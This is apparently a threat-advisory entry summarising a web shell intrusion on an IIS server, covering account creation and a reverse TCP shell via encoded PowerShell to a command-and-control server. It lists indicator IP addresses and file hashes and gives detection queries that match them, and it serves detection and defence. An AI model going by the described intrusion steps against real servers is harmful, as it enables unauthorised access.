Date: 01/15/2025
Severity: High
Summary
"Investigating A Web Shell Intrusion" details an incident where endpoint sensors detected suspicious activity from an IIS worker (w3wp.exe). The attacker uploaded a web shell to the IIS server, which was previously unrestricted. This allowed the attacker to create a new user account, modify an existing user’s password, and set up a reverse TCP shell using encoded PowerShell commands to connect to a command-and-control server. The investigation and response efforts were key to identifying and mitigating the attack.
Indicators of Compromise (IOC) List
IP Address | 54.255.198.171 86.48.10.109 167.88.173.253 |
Hash |
e5746699eace0b47aa47fbefcf5aee67e67cec95
4a8eb063e811111b03c5d2c81b20f34ccaf63dd2
c74112afef359d2bf6b2879358b9651ef8d1c12c
7b3d29d83f2ac80a24f8eae791d563aec8311c6e
4e49beee8548cacb2fab3e2260b2255b86fd6b13
44ceb7e93498c89c7035bab4a494f95bc6267609 |
Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection
Detection Query 1 | dstipaddress IN ("54.255.198.171","86.48.10.109","167.88.173.253") or ipaddress IN ("54.255.198.171","86.48.10.109","167.88.173.253") or publicipaddress IN ("54.255.198.171","86.48.10.109","167.88.173.253") or srcipaddress IN ("54.255.198.171","86.48.10.109","167.88.173.253") |
Detection Query 2 |
sha1hash IN ("4a8eb063e811111b03c5d2c81b20f34ccaf63dd2","4e49beee8548cacb2fab3e2260b2255b86fd6b13","e5746699eace0b47aa47fbefcf5aee67e67cec95","c74112afef359d2bf6b2879358b9651ef8d1c12c","7b3d29d83f2ac80a24f8eae791d563aec8311c6e","44ceb7e93498c89c7035bab4a494f95bc6267609") |
Reference:
https://www.trendmicro.com/en_us/research/25/a/investigating-a-web-shell-intrusion-with-trend-micro--managed-xd.html